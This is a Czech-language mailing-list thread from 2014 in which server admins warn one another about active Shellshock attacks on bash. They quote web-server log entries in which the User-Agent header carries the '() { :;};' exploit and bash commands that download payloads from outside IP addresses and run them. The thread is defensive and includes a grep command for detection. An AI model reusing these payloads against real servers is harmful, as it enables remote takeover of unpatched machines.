[vpsFree.cz: community-list] {Disarmed} Re: Útoky na bash běží

[Vojtěch Sigler]

Ahoj,

tak ja mam v apache logu toto:

/var/log/httpd/access_log:173.45.100.18 - - [28/Sep/2014:23:42:22 +0200]
"GET /cgi-bin/hi HTTP/1.0" 404 295 "-" "() { :;}; /bin/bash -c \"cd
/tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat
; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

Skript, na ktery to odkazuje se da stahnout a rika si "perlbot"...

Vojta




Dne 29. září 2014 9:57 Jiří Medvěd <admin at jirimedved.cz> napsal(a):

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Hele,
>
> z jineho stroje:
>
> /var/log/nginx/access.log-20140929.gz:70.42.149.67 - -
> [28/Sep/2014:08:16:18 +0200] "GET / HTTP/1.0" 444 0 "-" "() { :;};
> /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x
> /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
>
> Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):
> > Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném
> > proudu, podle logu se mi včera někdo snažil do serveru nahrát
> > rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
> >
> > Pokud chcete vidět ty věci z logu, pak si grepněte:
> >
> > # grep '() {' /var/log/nginx/*
> >
> > Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
> >
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
>
> iF4EAREIAAYFAlQpENIACgkQ5JdzTS3AJTa8fAEAh8VbArIz7ElgezKEI44Yz5E9
> fSIKhd/2Z6T0ZSm3o+EA/0vaA7spDhwHRjGcOUtx81p+ScBcWvnM++8q3Iad3wPH
> =W15o
> -----END PGP SIGNATURE-----
> _______________________________________________
> Community-list mailing list
> Community-list at lists.vpsfree.cz
> http://lists.vpsfree.cz/listinfo/community-list
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.vpsfree.cz/pipermail/community-list/attachments/20140929/e25d4f8f/attachment-0002.html>